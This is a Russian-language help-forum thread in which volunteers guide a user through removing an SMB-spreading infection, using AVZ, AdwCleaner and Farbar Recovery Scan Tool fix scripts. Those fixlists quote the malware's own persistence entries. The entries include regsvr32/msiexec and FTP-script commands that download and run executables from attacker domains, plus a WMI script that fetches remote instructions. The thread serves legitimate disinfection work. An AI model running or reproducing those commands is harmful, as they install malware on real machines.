SMB:cve 2017 0144 - аваст ругается на вот это. Пробовал ставить Malwarebyte animalware. Как то не помогло. Что делать?
SMB:cve 2017 0144 - аваст ругается на вот это. Пробовал ставить Malwarebyte animalware. Как то не помогло. Что делать?
Уважаемый(ая) ponchuk21, спасибо за обращение на наш форум!
Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.
Информация
Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.
Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.
Здравствуйте,
Удалите Driver Booster через установку программ в панели управления.
Сообщите, что из следующего вам известно?
AVZ выполнить следующий скрипт.Код:O4 - MSConfig\startupreg: electron.app.Untapped.gg Companion [command] = C:\Users\Ivan\AppData\Local\Programs\untapped-companion\Untapped.gg Companion.exe --autostart (HKCU) (2019/05/05) O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14443 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14444 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 21 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 2222 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 4444 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 6666 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8443 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8888 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9999 TCP) (mirrored) - Action: Block
Важно на ОС: Windows Vista/7/8/8.1 AVZ запускайте через контекстное меню проводника от имени Администратора.
После выполнения скрипта компьютер перезагрузится.Код:begin ShowMessage('Внимание! Перед выполнением скрипта AVZ автоматически закроет все сетевые подключения.'+#13#10+'После перезагрузки компьютера подключения к сети будут восстановлены в автоматическом режиме.'); ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); QuarantineFile('D:\PHOTOC~1\ncontext.dll',''); QuarantineFile('C:\Users\Ivan\AppData\Local\Programs\untapped-companion\Untapped.gg',''); DeleteFile('C:\Windows\system32\Tasks\Driver Booster SkipUAC (иваааааан)','64'); DeleteFile('C:\Windows\system32\Tasks\Driver Booster Scheduler','64'); BC_ImportQuarantineList; BC_Activate; ExecuteWizard('SCU', 2, 3, true); RebootWindows(true); end.
После перезагрузки:
- Выполните в AVZ:
Файл quarantine.zip из папки AVZ загрузите по ссылке "Прислать запрошенный карантин" вверху темы.Код:begin CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); end.
- Подготовьте лог AdwCleaner и приложите его в теме.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
готово. Простите что так долго !
По вопросу что мне из того известно - Untapped.gg кажется ставил год назад +- для игры MTG Arena. Вроде никак себя не проявлял. Остальное хз, не разбираюсь в этом...
Последний раз редактировалось ponchuk21; 09.10.2019 в 11:54.
Если правила не сами устанавливали, то профиксите их.
HiJackThis (из каталога autologger)профиксить
Важно: необходимо отметить и профиксить только то, что указано ниже.
Код:O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 135 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 139 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: Any IP - Destination: my IP (Port 445 UDP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14443 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 14444 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 21 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 2222 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 3333 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 4444 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 5555 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 6666 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 7777 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8443 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 8888 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9000 TCP) (mirrored) - Action: Block O7 - IPSec: Name: qianye (2019/10/04) - {e69ec88b-e896-473b-b3e1-ad967957a245} - Source: my IP - Destination: Any IP (Port 9999 TCP) (mirrored) - Action: Block
Удалите в AdwCleaner всё, кроме папок с названиями программ которыми вы пользуетесь (если ничем из перечисленного в логе не пользуетесь, то удалите всё). Отчет после удаления прикрепите.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
готово
- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Готово
- Закройте и сохраните все открытые приложения.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:Start:: CreateRestorePoint: CloseProcesses: HKLM\...\Run: [start] => regsvr32 /u /s /i:hxxp://js.1226bye.xyz:280/v.sct scrobj.dll <==== ATTENTION HKLM\...\Run: [start1] => msiexec.exe /i hxxp://js.1226bye.xyz:280/helloworld.msi /q <==== ATTENTION FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION Task: {20F445D9-3A84-4234-8292-388154AB791D} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION Task: {51929E0F-76B1-4970-9854-DEDD52B5C86C} - System32\Tasks\Mysa => cmd /c echo open ftp.1226bye.xyz>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe <==== ATTENTION Task: {5B535D46-E651-4D5F-872A-E23346511362} - System32\Tasks\Mysa3 => cmd /c echo open ftp.1226bye.xyz>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe <==== ATTENTION Task: {ABCEBEB4-E0EE-447C-9FAA-B2839E16CCC6} - System32\Tasks\Mysa2 => cmd /c echo open ftp.1226bye.xyz>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p <==== ATTENTION Task: {C5D784ED-7AE6-4A78-B7C2-78609611CBB2} - \Driver Booster SkipUAC (иваааааан) -> No File <==== ATTENTION NETSVC: Ms183512EEApp -> no filepath. NETSVC: Ms183512EEAppA -> no filepath. NETSVC: Ms183512EEAppBak -> no filepath. NETSVC: Ms183512EEAppB -> no filepath. 2019-10-05 12:23 - 2019-10-10 08:39 - 000000080 _____ C:\Windows\system32\s 2019-10-05 12:23 - 2019-10-10 08:39 - 000000078 _____ C:\Windows\system32\ps 2019-10-05 12:23 - 2019-10-10 08:39 - 000000076 _____ C:\Windows\system32\p 2019-10-05 11:27 - 2019-10-10 18:00 - 000003518 _____ C:\Windows\system32\Tasks\Mysa 2019-10-05 11:27 - 2019-10-10 18:00 - 000003504 _____ C:\Windows\system32\Tasks\Mysa3 2019-10-05 11:27 - 2019-10-10 18:00 - 000003424 _____ C:\Windows\system32\Tasks\Mysa2 2019-10-05 11:27 - 2019-10-10 18:00 - 000003190 _____ C:\Windows\system32\Tasks\Mysa1 2019-10-05 11:27 - 2019-10-05 11:27 - 000000067 _____ C:\Program Files\Common Files\xpdown.dat 2019-10-05 11:27 - 2019-10-05 11:27 - 000000005 _____ C:\Windows\system32\1.txt 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\winsps.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\taskmgr.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\SysWOW64\csrs.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\svchost.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\mask.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Windows\lsass.exe File: C:\Windows\Install.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\Users\Все пользователи\svhost.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D C:\ProgramData\svhost.exe 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\xx.txt 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\SysWOW64\xx.txt 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\SysWOW64\xs.ini 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\ma.bak 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\In.bak 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\ex.xx2s 2019-10-04 09:46 - 2019-10-04 09:46 - 000000000 ____D C:\Windows\13.txt 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D () C:\ProgramData\svhost.exe 2019-10-04 12:10 - 2019-10-04 12:10 - 000000000 ____D () C:\Users\Все пользователи\svhost.exe 2019-10-05 11:27 - 2019-10-05 11:27 - 000000067 _____ () C:\Program Files\Common Files\xpdown.dat File: C:\Windows\SysWOW64\lsprst7.dll File: C:\Windows\SysWOW64\sysprs7.dll ContextMenuHandlers1: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File ContextMenuHandlers4: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File ContextMenuHandlers6: [PhotoConverter7_std] -> [CC]{0C83C06D-41F5-4666-B1C2-0923EA75EB10} => -> No File ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> No File ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> No File WMI:subscription\__TimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION WMI:subscription\__IntervalTimerInstruction->fuckyoumm2_itimer:: <==== ATTENTION WMI:subscription\__EventFilter->fuckyoumm2_filter::[Query => select * from __timerevent where timerid="fuckyoumm2_itimer"] <==== ATTENTION WMI:subscription\ActiveScriptEventConsumer->fuckyoumm2_consumer::[ScriptText => var toff=3000;var url1 = "http://wmi.0814ok.info:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f (the data entry has 1430 more characters).] <==== ATTENTION HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\dump_183512EE.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Ms183512EEAppB => ""="Service" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\dump_183512EE.sys => ""="Driver" HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\Ms183512EEAppB => ""="Service" Reboot: End::- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
- Покажите лог TDSSKiller
Файл C:\TDSSKiller.***_log.txt приложите в теме.
(где *** - версия программы, дата и время запуска.)
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Готово!
Могли бы каталог C:\FRST\Quarantine заархивировать с паролем virus и загрузите по ссылке "Прислать запрошенный карантин" вверху темы.
Скачайте программу Universal Virus Sniffer и сделайте полный образ автозапуска uVS.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
все готово, но архив не влазит. Буквально 70 кб
не влезает архив
На облако/файлообменник и ссылку в тему.
WBR,
Vadim
Не возможно скачать, требует авторизацию, могли бы разрешить скачивание для все?
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
прошу прощения, попробуйте теперь. https://drive.google.com/file/d/19oc...ew?usp=sharing
- Закройте и сохраните все открытые приложения.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:Start:: CreateRestorePoint: CloseProcesses: WMI:subscription\__FilterToConsumerBinding->\\.\root\subscription:ActiveScriptEventConsumer.Name=\"fuckyoumm2_consumer\"",Filter="\\.\root\subscription:__EventFilter.Name=\"fuckyoumm2_filter\":: <==== ATTENTION Reboot: End::- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
Приложите пожалуйста следующий новый лог:
- Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.
Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
- Запустите программу двойным щелчком. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
- Убедитесь, что в окне Optional Scan отмечены "List BCD" и "SigCheckExt".
- Нажмите кнопку Scan.
- После окончания сканирования будет создан отчет (FRST.txt) в той же папке, откуда была запущена программа. Пожалуйста, прикрепите отчет в следующем сообщении.
- Если программа была запущена в первый раз, будет создан отчет (Addition.txt). Пожалуйста, прикрепите его в следующем сообщении.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
готово
- Закройте и сохраните все открытые приложения.
- Скопируйте приведенный ниже текст в Блокнот и сохраните файл как fixlist.txt с поддержкой Unicode в ту же папку откуда была запущена утилита Farbar Recovery Scan Tool:
Код:Start:: CreateRestorePoint: CloseProcesses: FF HKLM\SOFTWARE\Policies\Mozilla\Firefox: Restriction <==== ATTENTION File: C:\Windows\System32\Drivers\ax8x0k1h.sys File: C:\Windows\Install.exe Folder: C:\ProgramData\WmiAppSrv Folder: C:\ProgramData\Natioanl Folder: C:\ProgramData\reaConverter7 File: C:\Windows\SysWOW64\lsprst7.dll File: C:\Windows\SysWOW64\sysprs7.dll Reboot: End::- Запустите FRST и нажмите один раз на кнопку Fix и подождите.
- Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении!
- Обратите внимание, что компьютер будет перезагружен.
CCNA, CCNP, CCNA Security, CCDA, CCDP
MCP, Microsoft Specialist: Srv Virtualization with WinSrv Hyper-V and System Center
Уважаемый(ая) ponchuk21, наши специалисты оказали Вам всю возможную помощь по вашему обращению.
В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:
Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:
Надеемся больше никогда не увидеть ваш компьютер зараженным!
Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.